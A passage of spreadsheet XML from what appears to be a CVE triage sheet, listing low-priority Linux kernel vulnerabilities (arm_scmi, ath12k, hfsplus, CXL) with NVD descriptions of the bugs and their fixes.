it until scmi_device_destroy() has finished unregistering the child.
Also split device_unregister() in __scmi_device_destroy() so the SCMI bus
ID is not made reusable until after device_del() has removed the old
scmi_dev.N name from sysfs. This avoids a new SCMI device reusing the
same ID while the old device is still registered.
The final device release callback is also a possible cleanup path when
SCMI children are deleted by driver core recursion rather than
__scmi_device_destroy(). Release the SCMI bus ID from a common helper
used by destroy, register-failure and final-release paths, and clear
scmi_dev-&gt;id after freeing it so the final release cannot free the same
ID again.</t>
        </is>
      </c>
      <c r="T899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93081</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93082</t>
        </is>
      </c>
      <c r="D900" s="5" t="inlineStr"/>
      <c r="E900" s="5" t="inlineStr"/>
      <c r="F900" s="5" t="inlineStr"/>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="inlineStr"/>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr"/>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q900" s="5" t="inlineStr"/>
      <c r="R900" s="5" t="inlineStr"/>
      <c r="S900" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unwind P2A receiver mailbox setup failure
mailbox_chan_setup() can request an additional P2A receiver channel after
successfully acquiring the primary P2A channel. If that later request
fails, the function returns immediately and leaves the primary channel
allocated.
Unwind the primary mailbox channel before returning the error so probe
deferral or other setup failures do not leave the channel busy for later
probe attempts.</t>
        </is>
      </c>
      <c r="T900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93082</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93083</t>
        </is>
      </c>
      <c r="D901" s="5" t="inlineStr"/>
      <c r="E901" s="5" t="inlineStr"/>
      <c r="F901" s="5" t="inlineStr"/>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="inlineStr"/>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr"/>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q901" s="5" t="inlineStr"/>
      <c r="R901" s="5" t="inlineStr"/>
      <c r="S901" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unwind TX receiver mailbox setup failure
mailbox_chan_setup() can request an additional unidirectional TX
receiver channel after successfully acquiring the primary channel. If
that second request fails, the function returns immediately and leaves
the primary channel allocated.
Unwind the primary mailbox channel before returning the error so probe
deferral or other setup failures do not leave the channel busy for later
probe attempts.</t>
        </is>
      </c>
      <c r="T901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93083</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93084</t>
        </is>
      </c>
      <c r="D902" s="5" t="inlineStr"/>
      <c r="E902" s="5" t="inlineStr"/>
      <c r="F902" s="5" t="inlineStr"/>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="inlineStr"/>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr"/>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q902" s="5" t="inlineStr"/>
      <c r="R902" s="5" t="inlineStr"/>
      <c r="S902" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Drop handle on protocol bind failures
The SCMI bus notifier acquires an SCMI handle when the driver core emits
BUS_NOTIFY_BIND_DRIVER, before invoking the protocol driver probe
callback. The protocol probe path only checks whether sdev-&gt;handle is
set.
If device_link_add() fails after the handle has been acquired, the
protocol device can still bind with a valid handle but without the
dependency link to the SCMI parent. A concurrent parent unbind can then
miss the child and tear down the SCMI instance while the child still
holds a handle into it.
If the protocol driver probe later fails, for example with
-EPROBE_DEFER, the driver core emits BUS_NOTIFY_DRIVER_NOT_BOUND rather
than BUS_NOTIFY_UNBOUND_DRIVER. The SCMI notifier only released the
handle on BUS_NOTIFY_UNBOUND_DRIVER, so each failed protocol-device bind
leaked the SCMI instance users refcount and left sdev-&gt;handle set after
the failed probe.
Make the link helper report failure and drop the acquired handle if the
link cannot be created. Also handle BUS_NOTIFY_DRIVER_NOT_BOUND in the
same cleanup path used for unbind so failed probes balance the earlier
BUS_NOTIFY_BIND_DRIVER acquisition.</t>
        </is>
      </c>
      <c r="T902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93084</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93085</t>
        </is>
      </c>
      <c r="D903" s="5" t="inlineStr"/>
      <c r="E903" s="5" t="inlineStr"/>
      <c r="F903" s="5" t="inlineStr"/>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="inlineStr"/>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr"/>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q903" s="5" t="inlineStr"/>
      <c r="R903" s="5" t="inlineStr"/>
      <c r="S903" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Reject out of range DT protocol IDs
SCMI protocol IDs carried in message headers are limited by
MSG_PROTOCOL_ID_MASK. The DT parsing paths noticed protocol IDs
outside that range, but only logged an error and then kept processing
the invalid value.
That lets a malformed 32-bit DT reg value reach helpers which take a u8
protocol ID, where it can be truncated and/or treated as a different
protocol.
For channel setup, two different out-of-range values can also be used as
distinct IDR keys while aliasing the generated SCMI protocol identity.
Skip DT protocol nodes whose reg value does not fit the SCMI protocol ID
field before setting up channels or creating protocol devices.</t>
        </is>
      </c>
      <c r="T903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93085</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93086</t>
        </is>
      </c>
      <c r="D904" s="5" t="inlineStr"/>
      <c r="E904" s="5" t="inlineStr"/>
      <c r="F904" s="5" t="inlineStr"/>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="inlineStr"/>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr"/>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q904" s="5" t="inlineStr"/>
      <c r="R904" s="5" t="inlineStr"/>
      <c r="S904" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Avoid IDR updates while cleaning channels
scmi_cleanup_channels() walks the TX/RX channel IDRs with
idr_for_each() to free transport resources and destroy the dedicated
transport devices before calling idr_destroy().
The destroy callback removed each entry from the same IDR being walked.
That is not needed for this cleanup path, and it is unsafe because
idr_for_each() has not advanced its radix-tree iterator while the
callback is running. Removing the current entry from the callback can
invalidate the iterator state. The callback also cannot be protected by
rcu_read_lock(), because scmi_device_destroy() may sleep.
Leave IDR teardown to the following idr_destroy() call and keep the
callback limited to device destruction.</t>
        </is>
      </c>
      <c r="T904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93086</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93089</t>
        </is>
      </c>
      <c r="D905" s="5" t="inlineStr"/>
      <c r="E905" s="5" t="inlineStr"/>
      <c r="F905" s="5" t="inlineStr"/>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="inlineStr"/>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr"/>
      <c r="L905" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q905" s="5" t="inlineStr"/>
      <c r="R905" s="5" t="inlineStr"/>
      <c r="S905" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Free transport channel on IDR failure
If transport channel setup succeeds but the following IDR insertion fails,
the error path destroys the transport device and frees the channel info
without invoking the transport cleanup callback.
Call chan_free() before destroying the device so transport specific
resources such as IRQs, mailbox channels and mapped shared memory are
released consistently with the normal teardown path.</t>
        </is>
      </c>
      <c r="T905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93089</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93090</t>
        </is>
      </c>
      <c r="D906" s="5" t="inlineStr"/>
      <c r="E906" s="5" t="inlineStr"/>
      <c r="F906" s="5" t="inlineStr"/>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="inlineStr"/>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr"/>
      <c r="L906" s="5" t="inlineStr"/>
      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q906" s="5" t="inlineStr"/>
      <c r="R906" s="5" t="inlineStr"/>
      <c r="S906" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Clean up channels on setup failure
scmi_channels_setup() can fail after the common BASE channel or earlier
protocol channels have already been registered in the TX/RX IDRs.
Route this failure through the existing channel cleanup label so the
transport channels, transport devices and IDR state created before the
failure are released before the probe error path frees the SCMI instance
ID.</t>
        </is>
      </c>
      <c r="T906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93090</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93091</t>
        </is>
      </c>
      <c r="D907" s="5" t="inlineStr"/>
      <c r="E907" s="5" t="inlineStr"/>
      <c r="F907" s="5" t="inlineStr"/>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="inlineStr"/>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr"/>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q907" s="5" t="inlineStr"/>
      <c r="R907" s="5" t="inlineStr"/>
      <c r="S907" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Quiesce notifications before teardown
scmi_notification_exit() clears and releases the notification instance,
but transport callbacks can still deliver incoming notifications until
the TX/RX channels are freed. During remove, an RX interrupt in that
window can enter scmi_notify() while notification state is being torn
down and then dereference freed memory. The same ordering exists on the
probe error path after notification initialization.
The notification late-init worker has a separate lifetime issue: protocol
event registration queues ni-&gt;init_work on the system workqueue, so
destroying ni-&gt;notify_wq does not drain that work. If the devres group is
released while init_work is still pending or running, the late-init worker
can dereference the freed notification instance.
Quiesce the notification core before TX/RX channels are torn down, then
clean up the channels before releasing the notification core resources.
Use disable_work_sync() so future late-init queueing is rejected and any
already queued or running late-init work has completed before channel
teardown starts.</t>
        </is>
      </c>
      <c r="T907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93091</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93092</t>
        </is>
      </c>
      <c r="D908" s="5" t="inlineStr"/>
      <c r="E908" s="5" t="inlineStr"/>
      <c r="F908" s="5" t="inlineStr"/>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="inlineStr"/>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q908" s="5" t="inlineStr"/>
      <c r="R908" s="5" t="inlineStr"/>
      <c r="S908" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unregister device notifier before IDR teardown
The requested-devices notifier looks up protocol fwnodes from the
active_protocols IDR. During remove, unregister the notifier before
releasing and destroying active_protocols so no notifier callback can race
with the IDR teardown.
Keep the bus notifier registered until after the protocol state is torn
down, matching the existing remove ordering for SCMI bus users.</t>
        </is>
      </c>
      <c r="T908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93092</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93093</t>
        </is>
      </c>
      <c r="D909" s="5" t="inlineStr"/>
      <c r="E909" s="5" t="inlineStr"/>
      <c r="F909" s="5" t="inlineStr"/>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="inlineStr"/>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q909" s="5" t="inlineStr"/>
      <c r="R909" s="5" t="inlineStr"/>
      <c r="S909" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Publish channel state before callbacks
Transport setup can enable callbacks before the setup routine returns.
mailbox_chan_setup() registers the mailbox client with
mbox_request_channel(), and the mailbox controller startup path can enable
interrupt delivery before SCMI mailbox channel state has been published.
Similarly, smc_chan_setup() requests the optional A2P completion IRQ before
the SMC transport has made its cinfo pointer visible.
If a pending or spurious callback fires in those windows, the transport RX
callback can dereference a NULL transport cinfo pointer. Publishing only
the transport-private pointer is not sufficient either: an early callback
can enter the SCMI core before scmi_chan_setup() has assigned
cinfo-&gt;handle.
The core derives scmi_info from cinfo-&gt;handle in the RX path, so a NULL
handle can still fault even when the transport-private cinfo is valid.
Assign cinfo-&gt;handle before invoking the transport setup callback. Publish
the mailbox and SMC transport-private channel state before requesting the
mailbox channels or IRQ, and clear the early-published pointers again on
setup failure. Also unwind mailbox setup devres resources on failure so an
optional RX setup error that is ignored by the core does not leave stale
transport state behind.</t>
        </is>
      </c>
      <c r="T909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93093</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93094</t>
        </is>
      </c>
      <c r="D910" s="5" t="inlineStr"/>
      <c r="E910" s="5" t="inlineStr"/>
      <c r="F910" s="5" t="inlineStr"/>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="inlineStr"/>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr"/>
      <c r="L910" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q910" s="5" t="inlineStr"/>
      <c r="R910" s="5" t="inlineStr"/>
      <c r="S910" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: fix dp_link_peer dangling references on AP vdev rollback
ath12k_mac_vdev_create() for an AP vdev creates the bss self-peer via
ath12k_peer_create(), which finishes by calling
ath12k_dp_link_peer_assign() to publish the dp_link_peer in the
dp_hw-&gt;dp_peers[peerid_index] RCU table, in the dp_peer's
link_peers[] array, and in the per-addr rhashtable.
If a step after ath12k_peer_create() fails the function jumps to
err_peer_del, which open-codes a WMI peer_delete and waits for the
unmap / delete_resp events. The wait_for_peer_delete_done() path
relies on ath12k_dp_link_peer_unmap_event() freeing the dp_link_peer
when the unmap arrives, but err_peer_del never calls
ath12k_dp_link_peer_unassign() first. The published references in
the dp_hw RCU table, dp_peer-&gt;link_peers[] and the rhashtable are
left pointing at the dp_link_peer that unmap_event then frees,
producing dangling pointers and use-after-free on subsequent
lookups.
Replace the open-coded sequence with a call to ath12k_peer_delete(),
which already does ath12k_dp_link_peer_unassign() before sending the
WMI command. This drops the published references before the
dp_link_peer is freed, in the same order as the normal teardown path
in ath12k_mac_remove_link_interface().
Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c7-00108-QCAHMTSWPL_V1.0_V2.0_SILICONZ_UPSTREAM-3</t>
        </is>
      </c>
      <c r="T910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93094</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93095</t>
        </is>
      </c>
      <c r="D911" s="5" t="inlineStr"/>
      <c r="E911" s="5" t="inlineStr"/>
      <c r="F911" s="5" t="inlineStr"/>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="inlineStr"/>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr"/>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q911" s="5" t="inlineStr"/>
      <c r="R911" s="5" t="inlineStr"/>
      <c r="S911" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hfsplus: validate thread record before delete key rebuild
hfsplus_delete_cat() is called with str == NULL when the last open
reference to an unlinked HFS+ hardlink backing inode is closed. In that
case, the function finds the catalog thread by CNID and rebuilds the
catalog key from thread.nodeName.
That reconstruction path reads thread.nodeName.length directly from the
catalog B-tree into fd.search_key and then copies length * 2 bytes into
fd.search_key-&gt;cat.name.unicode. It does not first check that the found
record is a thread record or that its size matches the thread name.
A corrupted image can therefore provide an oversized thread name length
and make hfs_bnode_read() write past the catalog search-key allocation.
Read the CNID record through hfsplus_brec_read_cat(), which bounds the
record read to sizeof(hfsplus_cat_entry) and verifies that a thread
record's size exactly matches nodeName.length. Together, these checks
ensure an accepted thread name fits HFSPLUS_MAX_STRLEN. Reject non-thread
records before building the delete key from the validated thread name.
Share the thread-record-type helper between hfsplus_find_cat() and
hfsplus_delete_cat().</t>
        </is>
      </c>
      <c r="T911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93095</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93096</t>
        </is>
      </c>
      <c r="D912" s="5" t="inlineStr"/>
      <c r="E912" s="5" t="inlineStr"/>
      <c r="F912" s="5" t="inlineStr"/>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="inlineStr"/>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr"/>
      <c r="L912" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q912" s="5" t="inlineStr"/>
      <c r="R912" s="5" t="inlineStr"/>
      <c r="S912" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Serialize multi-part Get/Set Feature transfers
A Get or Set Feature payload larger than the mailbox payload size is
split into several mailbox commands. mbox_mutex only serializes
individual mailbox commands and is dropped between iterations of these
loops. Nothing serializes the multi-part transfer as a whole.
cxl_get_feature() and cxl_set_feature() are reachable concurrently
from fwctl (per-fd RPCs run under a read-held registration lock) and
from the EDAC scrub/ECS/repair paths, so two transfers to the same
mailbox can interleave their parts and corrupt the device's transfer
context.
Add a per-mailbox feat_mutex and hold it across the whole transfer in
both functions. It nests outside mbox_mutex (which is taken inside
cxl_internal_send_cmd()), and is taken nowhere else, so no lock-ordering
inversion is introduced.</t>
        </is>
      </c>
      <c r="T912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93096</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93097</t>
        </is>
      </c>
      <c r="D913" s="5" t="inlineStr"/>
      <c r="E913" s="5" t="inlineStr"/>
      <c r="F913" s="5" t="inlineStr"/>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="inlineStr"/>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr"/>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q913" s="5" t="inlineStr"/>
      <c r="R913" s="5" t="inlineStr"/>
      <c r="S913" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/mbox: Break poison list loop on an empty payload
A device that returns count == 0 with CXL_POISON_FLAG_MORE set on every
iteration never advances nr_records, so the max_errors guard never
trips and the do/while loops forever while holding poison.mutex. That
hangs the sysfs-triggered scan thread and blocks all subsequent poison
operations on the device. The existing "Protect against an uncleared
_FLAG_MORE" guard was intended to bound a misbehaving device but does
not cover the count == 0 case.
Stop the loop on an empty payload so a malfunctioning or malicious
device cannot wedge the poison scan.</t>
        </is>
      </c>
      <c r="T913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93097</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93098</t>
        </is>
      </c>
      <c r="D914" s="5" t="inlineStr"/>
      <c r="E914" s="5" t="inlineStr"/>
      <c r="F914" s="5" t="inlineStr"/>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="inlineStr"/>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr"/>
